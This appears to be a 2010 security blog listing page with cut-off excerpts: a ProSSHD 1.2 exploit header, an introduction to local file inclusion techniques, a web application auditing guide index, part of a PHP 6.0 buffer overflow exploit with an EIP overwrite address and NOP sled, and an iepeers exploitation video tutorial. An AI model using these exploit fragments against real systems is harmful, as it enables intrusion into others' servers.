May 4, 2010
admin 5,768 views
# Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# EDB-ID: 12495
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published: 2010-05-03
# Verified: yes
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine [www.xakep.ru]
#
#
# CVE: – Read more…
April 21, 2010
admin 10,662 views
Local File Inclusion
As the title says, this is a “short” and descriptive guide about
various methods to exploit using a local file inclusion (LFI).
I will cover the following topics:
• Poison NULL Bytes
• Log Poisoning
• /proc/self/
• Alternative Log Poisoning
• Malicious image upload
• Injection of code by the use of e-mails
• Creativity
By: Fredrik Nordberg Almroth
URL: http://h.ackack.net/
So the question is: what is an LFI?
An LFI is, as the title says,
a method for servers/scripts to include local files at run-time,
in order to make complex systems of procedure calls.
Most of the time, you find LFI vulnerabilities in the URLs
of web pages,
mainly because developers tend to like using GET requests
when including pages.
Nothing more. Nothing less.
Read more…
April 5, 2010
admin 14,101 views
Source: packetstorm.com
Web Application Auditing and Exploitation
By ReZEN
Index Title
Index
What is a Web Application
Intro To PHP
Function Exploitation Overview
Exploitable Functions
Examples
Application Assisted Auditing
Credits
Gr33tz / Fuckz
What is a “WebApp”?
In software engineering, a web application—sometimes
called a webapp and much less frequently a
weblication—is an application that’s accessed with a web
browser over a network such as the Internet or an
intranet. Web applications are popular due to the
ubiquity of the browser as a client, sometimes called a
thin client. The ability to update and maintain web
applications without distributing and installing software
on potentially thousands of client computers is a key
reason for their popularity. Web applications are used to
implement webmail, online retail sales, online auctions,
wikis, discussion boards, weblogs, MMORPGs, and many
other functions.
What is a “WebApp”? (cont.)
Read more…
April 5, 2010
admin 1,584 views
Source: http://www.exploit-db.com/exploits/12051
# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# EDB-ID: 12051
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-04-04
# Verified: no
<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploit a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, ‘unicode.semantics’ has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 256);
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("\u9090", 20);
Read more…
March 18, 2010
admin 2,024 views
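Made a video tutorial for linux520.com
Exploit iepeers vul with ettercap and metasploit framework video
Watch online:
Exploit iepeers vul with ettercap (part 1)
http://www.linux520.com/v/l00066/l00066.html
Exploit iepeers vul with ettercap (part 2)
http://www.linux520.com/v/l00067/l00067.html
The slides (PPT) are uploaded:
Exploit iepeers vul with ettercap && msf (ppt):
Exploit iepeers vul with ettercap
Some rambling up front:
This tutorial was written by kindle. kindle has taught me a lot and deserves the gratitude of us newbies, but he has been hacking too many sites lately, is worn out and has been running a high fever, so I recorded it on his behalf. I hope kindle's fever breaks the moment he sees this tutorial so he can get back to hacking sites. • Apologies to everyone: for personal reasons I have been feeling rather down lately and don't feel like talking, so I did not record a voice-over. Please bear with me, and please ignore the typos, thanks!
Video link to be added later.
Please visit linux520.com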